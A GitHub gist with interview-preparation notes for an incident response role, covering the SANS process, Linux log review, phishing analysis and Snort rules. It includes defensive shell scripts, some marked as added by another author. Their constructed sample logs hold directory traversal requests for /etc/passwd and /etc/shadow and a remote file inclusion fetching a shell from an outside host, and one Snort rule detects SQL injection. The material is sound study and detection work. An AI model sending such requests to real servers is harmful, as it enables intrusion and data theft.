  • Save jjjjackson/55e080fda2b992c149bc1372150b19fd to your computer and use it in GitHub Desktop.
[ Indeed ] Incident Response Onsite Interview Experience

First of all, congratulations!! finally !! onsite!!! fight!!!!

I am a full-stack engineer who is trying to get into the security area, so I applied for the Incident Response position at Indeed.

Before the interview, I totally had no idea what to prepare. And right up until the last minutes before the interview I was still reviewing pentesting stuff, which was never mentioned in the interview 😂.

So I hope this article helps you get some idea of what to prepare.

This article is for my friend who is taking the onsite interview this week; meanwhile, I just finished the interview last week ☺️,

so the article might not be that well organised and has a super casual tone ☺️ ((( because I want to help him pass the interview in advance. Will I finish the full article by Xmas? Maybe?

I had never learned anything about incident response before the interview; the ideas here are things I read in these few days. So the answers below might not be the best answers, just an example of the train of thought.

This is not meant as criteria, guidelines or a standard; I am still waiting for the offer ☺

If you still have 10 days to prepare, I highly recommend reading the book 网络安全应急响应技术实战指南 (a Chinese-language practical guide to cybersecurity incident response).

All of the questions can be answered from the book. ((( Didn't find an English version, but will look for one during Xmas? 🤪 )

Chinese version portal --- but I haven't finished writing it yet ☺️

Japanese version portal --- but it's not done yet ☺️

TL;DR What to Prepare

  • Know the incident response process ( Very Important )
    • The basic phases of incident response (Indeed follows the SANS process)
    • Understand how to contain an intrusion and malware
    • Understand the Mandiant attack lifecycle and combine it with the incident response process and with containment
  • Snort rules
    • They will not ask you to write a rule, but you need to understand what a given rule is for.
  • Linux logs
    • ((( Indeed still uses data centres, so Linux logs were mentioned several times in the interview )))
    • Logs of what actions were taken
    • Current process usage
    • Current memory usage
    • How to detect malware
  • SSH access & Apache logs
    • Determine whether the server was accessed
  • API logs
    • Determine whether the API was attacked with directory traversal, whether the attacker got data, what their target was and what their next step would be
    • Combine with the Mandiant attack lifecycle
  • Phishing email
    • Determine whether an email is a phishing email
    • The response when users have downloaded the malware and executed the files
  • OWASP Top 10
    • SQL injection
    • XSS
  • PHP & Apache
    • eval
    • local file inclusion
    • remote file inclusion

Interview Process

TL;DR

Do not take the interview in the early morning

Process

First of all, congratulations to the onsite interview cycle.

Because of COVID-19, and because the incident response team members are almost all in the States, the interview is done remotely.

The onsite interview is split into 6 sections ( Phishing / Alert Analysis and Detection / Log Analysis / Major IR / Team Culture / Manager )

Phishing / Alert Analysis and Detection / Log Analysis / Major IR

No matter the topic, every question is log reading -> identifying -> containment.

Whatever the section, the questions all follow this logic, just using different logs.

Ex:

  • phishing -> mail log
  • alert -> network log
  • log -> linux log & API log
  • Major IR -> Apache log & API log, etc.

The team does not expect the candidate to have any incident response knowledge,

but almost every question will rotate back to the incident response process...

A tip for answering the questions: forget all the modern infrastructure, e.g. WAF, RDS, LB, Kubernetes, Docker, snapshots, Datadog, CloudWatch, L, distributed counting, separated front end/back end, etc...

Even forget the well-known IP addresses such as 1.1.1.1 or 8.8.8.8; in the questions those are just example IPs.

But don't forget the monolithic server running Apache that renders the front end on the server, with a framework such as CodeIgniter, CakePHP, or Django (the old versions).

Keep the architecture in your mind as simple as possible; it will help you answer.

Team Culture / Manager

The team culture session is quite a casual talk. The interviewers are the security team members in Tokyo.

The security team in Tokyo is quite a small team, so you will work with them quite a lot. (They said that 😂)

About the conversation with the manager ... TBH... I don't really remember what we talked about...

Because the interview before the manager one ran until 1 am ... and the manager meeting was at 8 am ...😂

So here is a tip: never have the interview in the early morning. Seriously. 😂

Incident Response / Major IR

TL;DR

Understand the Mandiant attack lifecycle and combine it with the incident response process, so that you know how to deal with the situation and contain it

Incident Response Process

The graph below is the basic process of incident response (the SANS phases: Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned).

In the interview, it is better to keep the graph in mind all the time.

Be clear about which phase you are in now, what the actions of that phase are, and what the next actions will be.

(( Before the interview I thought they would just ask me the meaning of each step, but that was too silly and naive ☺️ ))

For example, in Identification, understand what the attack is, what the attacker might have obtained, and whether it succeeded.

Before the interview, they always said: don't worry if you don't know incident response,

But the truth is, if you don't know it, it is impossible to answer the questions 😂😂😂😂

So memorise it.

Mandiant Attack Lifecycle

Literally, this is the attacker's mental model.

Once attackers crack the wall and get into the system, the lifecycle gives them a mindset for choosing the next step towards the target (in Mandiant's terms: initial recon, initial compromise, establish foothold, escalate privileges, internal recon, move laterally, maintain presence, complete mission).

Basically, there are two points:

  1. make sure there is a way to come back into the servers (a foothold, i.e. persistence)
  2. keep escalating privileges

Incident Response Process + Mandiant Attack Lifecycle

When answering questions, always think about how far the attack has got: has the attacker escalated privileges, and how do you check whether they have?

For example, when you see that a file like `../../../../../../passwd` was accessed, you should be able to think: the attacker can now know [who] has [what privileges], or in fact the attacker can't do much with it.

((( Because Linux has moved the password hashes to /etc/shadow... so although the file is called passwd there are actually no passwords in it. If you don't know that, you can only guess there are passwords in there! Who told it to have that name!! )))

Then look at whether there is a way to find credentials or some route to gain more privileges.

From normal user privileges -> administrator privileges: that is privilege escalation.

If the attacker has escalated privileges, the incident response process is different.

How to respond and how to contain is what the interviewer is actually asking; they will give you more details of the scenario.

Actually, it's not only Major IR that asks about this; the other sections say they are about reading logs, but this model keeps showing up.

So below let's look at how to answer in each situation.
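The log reading -> identifying step for the traversal case above, as an added example (mine, not from the gist or from Indeed): it percent-decodes each request path in an Apache combined-format access log, flags directory traversal and remote file inclusion attempts, and reports the HTTP status so you can say whether the attempt worked. The log lines are constructed for this example and the IPs are documentation ranges; the function names are mine.

```shell
# Added example (not from the original gist): scan an Apache combined-format
# access log for directory traversal and remote file inclusion attempts.
# A 200 on "../../../../etc/passwd" is the case discussed above: the attacker
# now has the account list (not the password hashes, which live in /etc/shadow).

make_sample_log() {
  # constructed log lines; documentation IP ranges
  cat > "$1" <<'EOF'
203.0.113.7 - - [12/Dec/2020:03:14:01 +0900] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2020:03:14:05 +0900] "GET /index.php?page=../../../../../../etc/passwd HTTP/1.1" 200 1864 "-" "curl/7.64.1"
203.0.113.7 - - [12/Dec/2020:03:14:09 +0900] "GET /index.php?page=..%2F..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 403 213 "-" "curl/7.64.1"
203.0.113.7 - - [12/Dec/2020:03:15:40 +0900] "GET /index.php?page=http://198.51.100.9/shell.txt HTTP/1.1" 200 312 "-" "curl/7.64.1"
198.51.100.22 - - [12/Dec/2020:03:16:00 +0900] "GET /api/users/42 HTTP/1.1" 200 411 "-" "Mozilla/5.0"
EOF
}

# Print one line per suspicious request: ip<TAB>kind<TAB>status<TAB>decoded_path.
# Fields assume the combined log format ($1 = client IP, $7 = path, $9 = status).
# Percent-decoding is done first so "..%2F" is caught as well as "../" (%00 is dropped).
scan_web_log() {
  awk '
    BEGIN { for (i = 1; i < 256; i++) code[sprintf("%02X", i)] = sprintf("%c", i) }
    function urldecode(s,    out) {
      out = ""
      while (match(s, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
        out = out substr(s, 1, RSTART - 1) code[toupper(substr(s, RSTART + 1, 2))]
        s = substr(s, RSTART + 3)
      }
      return out s
    }
    {
      path = urldecode($7); kind = ""
      if (index(path, "../") || index(path, "..\\"))                 kind = "traversal"
      else if (index(path, "=http://") || index(path, "=https://"))  kind = "rfi"
      if (kind != "") printf "%s\t%s\t%s\t%s\n", $1, kind, $9, path
    }' "$1"
}

# Source IPs behind the suspicious requests: the list you will contain.
attacker_ips()        { scan_web_log "$1" | cut -f1 | sort -u; }
# How many attempts the server answered with 2xx (i.e. probably succeeded).
successful_attempts() { scan_web_log "$1" | awk -F'\t' '$3 ~ /^2/ { n++ } END { print n + 0 }'; }

# Identification summary for the interview flow: who, what, and did it work.
identify() {
  echo "== suspicious requests ==";   scan_web_log "$1"
  echo "== source IPs to contain =="; attacker_ips "$1"
  echo "== attempts answered 2xx: $(successful_attempts "$1") =="
}

make_sample_log /tmp/access.log.example
identify /tmp/access.log.example
```

On the sample the /etc/passwd read and the remote include both got 200, the /etc/shadow read got 403: so the attacker has the user list and has very likely pulled a web shell in (the RFI line), but not the hashes. That is exactly the "has privilege been escalated, is there a new channel" question the section above is about.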

Linux Hacking Detection

I quite wanted to complain to the interviewers when I was asked this question ((hey~~~ I'm a software engineer, I do CloudWatch murmur 🤣 ))

And I am a Mac user, and I said maybe check the Activity Monitor and blah blah blah...

but I was still asked to answer with Linux command lines...

So guys and girls, be prepared.

This site and this site

give you a mind map, e.g. whether any extra users were added or any unknown processes are running.

The interviewers might say " hey, here is a 5GB log file, how will you find out whether the laptop was hacked or not".

This website explains the meaning of most of the logs; then follow that mindset ( e.g. unknown users or unknown processes ).

Ex: /var/log/cups is the CUPS printing system log, not a record of executed programs. Logins are recorded in /var/run/utmp (current sessions, read with `who`), /var/log/wtmp (login history, read with `last`) and /var/log/btmp (failed logins, read with `lastb`), and SSH authentication events go to /var/log/auth.log or /var/log/secure, so those are where to look for weird access.

BTW the interviewers don't really want an answer about using Python or Redis to analyse the logs.

It is better to memorise some of the basic Linux commands, e.g. find, grep, cat, egrep, awk, sed.

As a Mac user, ag, bat or fd might come to your mind ... but don't forget that they are not on a stock Linux server 😌

They might not ask you the parameters after find, but knowing what to look for is much more important.

Here are the materials to check the logs

Keep The Server Working

Also, when your server has been intruded, you can't just shut it down; you can only investigate and respond while the server keeps running.

What do you do?

A full-stack engineer would intuitively say: I'll just spin up another ECS container, change a Terraform param and redeploy the code.

That is definitely not the answer they want.........

Most of Indeed's services are still in data centers (the only thing I remember asking the manager 😌 )

You can't really run off to the data center to do this kind of thing (and it's not like the Tokyo data center is a 15-minute drive from Akasaka)

Basically it's still the same line of thinking as before, e.g.:

Which IP intruded -> which port / can it be closed -> [were privileges escalated] or [is there a new channel in] -> remove the channel
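The "close the port, remove the channel" end of that flow on a server that must stay up, as an added example (mine, not from the gist or from Indeed). It preserves volatile evidence first, then blocks the attacker IP, then removes the foothold (the account, its processes, its cron), and checks authorized_keys for keys that are not on an approved list. With DRY_RUN=1 the commands are printed instead of executed, so it can be rehearsed without root; with DRY_RUN=0 it runs them. The attacker IP, account name and key material are constructed.

```shell
# Added example (not from the original gist): containment on a live host.
# DRY_RUN=1 prints the commands; DRY_RUN=0 executes them (needs root).

run() {
  if [ "${DRY_RUN:-0}" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

# $1 = attacker IP, $2 = account the attacker used, $3 = evidence dir (default /root/ir)
contain_host() {
  ip="$1"; user="$2"; ev="${3:-/root/ir}"
  # 1. volatile evidence first: the process tree and sockets vanish once we start killing things
  run mkdir -p "$ev"
  run sh -c "ps auxfww > $ev/ps.txt"
  run sh -c "ss -tunap > $ev/ss.txt"
  run cp -p /var/log/auth.log "$ev/"
  # 2. close the attacker's channel in both directions: no more shells in, no more exfil out
  run iptables -I INPUT -s "$ip" -j DROP
  run iptables -I OUTPUT -d "$ip" -j DROP
  # 3. take away the foothold: lock the account, kill its processes, drop its cron
  run usermod -L "$user"
  run pkill -KILL -u "$user"
  run crontab -r -u "$user"
}

# Keys in authorized_keys ($1) that are not in the approved list ($2): a classic
# "new channel" left behind. Prints the comment field of each unknown key.
# (Lines with leading options such as command="..." are not handled here.)
unknown_keys() {
  awk 'NR == FNR { ok[$2] = 1; next }
       NF >= 2 && !($2 in ok) { print ($3 == "" ? "(no comment)" : $3) }' "$2" "$1"
}

make_sample_key_files() {
  # constructed key files; the key bodies are placeholders, not real keys
  mkdir -p "$1"
  printf '%s\n' 'ssh-ed25519 AAAAC3Nza-constructed-key-1 deploy@ci' > "$1/allowlist"
  printf '%s\n' 'ssh-ed25519 AAAAC3Nza-constructed-key-1 deploy@ci' \
                'ssh-rsa AAAAB3Nza-constructed-key-2 unknown-key' > "$1/authorized_keys"
}

make_sample_key_files /tmp/keys.example
echo "unknown keys:"; unknown_keys /tmp/keys.example/authorized_keys /tmp/keys.example/allowlist
DRY_RUN=1   # rehearsal: print the containment commands for the constructed case
contain_host 203.0.113.7 sysadm
```

The order is the point: capture `ps` and `ss` before `pkill`, and block the IP before locking the account, otherwise the attacker sees the lockout and has a window to switch to another channel. An unknown key is removed from authorized_keys (and, if the whole file is suspect, replaced from a known-good copy) once the evidence copy of it has been taken.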

Phishing

The questions look like the logs in these videos: https://youtu.be/ZmVOGVbnYvo or https://youtu.be/UVpu78B1pWQ
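The "is this a phishing email" decision from the TL;DR, as an added example (mine, not from the gist or the videos): the header checks an analyst runs before looking at the attachment at all. The headers are constructed, the domains are reserved example names (corp.example is the victim's domain, mail-example.net the sender's real infrastructure), and the indicator names are my own.

```shell
# Added example (not from the original gist): header checks for a suspected
# phishing email, run over a constructed header block.

make_sample_headers() {
  cat > "$1" <<'EOF'
Return-Path: <bounce@mail-example.net>
Received: from mx.mail-example.net (mx.mail-example.net [198.51.100.30])
 by mx.corp.example with ESMTP id 4Bq0; Sat, 12 Dec 2020 03:30:00 +0900
Authentication-Results: mx.corp.example;
 spf=fail smtp.mailfrom=mail-example.net;
 dkim=none
From: "Payroll Team" <payroll@corp.example>
Reply-To: payroll-desk@mail-example.net
To: victim@corp.example
Subject: Updated payslip - action required
Content-Type: application/zip; name="payslip_2020-12.zip"
EOF
}

# Join folded continuation lines (leading whitespace) back onto their header.
unfold_headers() {
  awk '
    /^[ \t]/ { sub(/^[ \t]+/, " "); cur = cur $0; next }
    { if (cur != "") print cur; cur = $0 }
    END { if (cur != "") print cur }
  ' "$1"
}

# First value of header $2 in file $1 (case-insensitive name match).
header_value() { unfold_headers "$1" | grep -i "^$2:" | head -n 1 | sed 's/^[^:]*:[[:space:]]*//'; }

# Domain part of an address like  "Name" <user@Domain>  -> domain, lower-cased.
addr_domain() { printf '%s\n' "$1" | sed -n 's/.*@\([A-Za-z0-9.-]*\).*/\1/p' | tr 'A-Z' 'a-z'; }

# One indicator per line. An empty result means "nothing obvious", not "clean".
phishing_indicators() {
  f="$1"
  from_d=$(addr_domain "$(header_value "$f" From)")
  reply_d=$(addr_domain "$(header_value "$f" Reply-To)")
  rp_d=$(addr_domain "$(header_value "$f" Return-Path)")
  auth=$(header_value "$f" Authentication-Results)
  ctype=$(header_value "$f" Content-Type)

  # replies and bounces going somewhere other than the displayed sender's domain
  [ -n "$reply_d" ] && [ "$reply_d" != "$from_d" ] && echo "reply-to-domain-mismatch: $from_d vs $reply_d"
  [ -n "$rp_d" ]    && [ "$rp_d"    != "$from_d" ] && echo "return-path-mismatch: $from_d vs $rp_d"
  # what our own MX concluded about SPF/DKIM for the envelope sender
  printf '%s\n' "$auth" | grep -qi 'spf=fail'  && echo "spf-fail"
  printf '%s\n' "$auth" | grep -qi 'dkim=pass' || echo "dkim-not-pass"
  # attachment types that execute or unpack to something that does
  name=$(printf '%s\n' "$ctype" | sed -n 's/.*name="\{0,1\}\([^";]*\)"\{0,1\}.*/\1/p')
  case "$name" in
    *.zip|*.exe|*.js|*.vbs|*.scr|*.iso|*.lnk|*.docm|*.xlsm|*.html) echo "risky-attachment: $name" ;;
  esac
  return 0
}

make_sample_headers /tmp/mail.example
phishing_indicators /tmp/mail.example
```

If a user has already opened the attachment, the output of this is the first thing you carry into the next phase: the Return-Path/Received domain gives you the sender infrastructure to block at the mail gateway, and the attachment name is what you search for on the endpoint and in the proxy logs.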

Snort

In this section, the interviewer will give you several detection rules that look like the following Snort rule

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( 
  msg:"SQL use of concat function with select - likely SQL injection";
  flow:to_server,established;
  http_uri; content:"SELECT ",nocase; content:"CONCAT|28|",within 100,nocase;
  metadata:policy max-detect-ips drop,policy security-ips drop; service:http;
  reference:url,ferruh.mavituna.com/sql-injection-cheatsheet-oku/;
  classtype:web-application-attack; sid:24172; rev:2;
)

This is not the interview question, just an example from the Snort rule examples.

Read it as: on established TCP traffic from $EXTERNAL_NET to a web port on $HOME_NET, look in the normalised HTTP URI for "SELECT " and then, within 100 bytes, "CONCAT(" (|28| is the hex for "("), both case-insensitive; metadata, reference and classtype give the policy action, a reference URL and the alert class, and sid/rev identify the rule and its revision. The rule is easy to understand with the explanation on this site.

Log

Linux

API

Apache

SSH Access

PHP

Reference

Books

Github

Wechat Blog
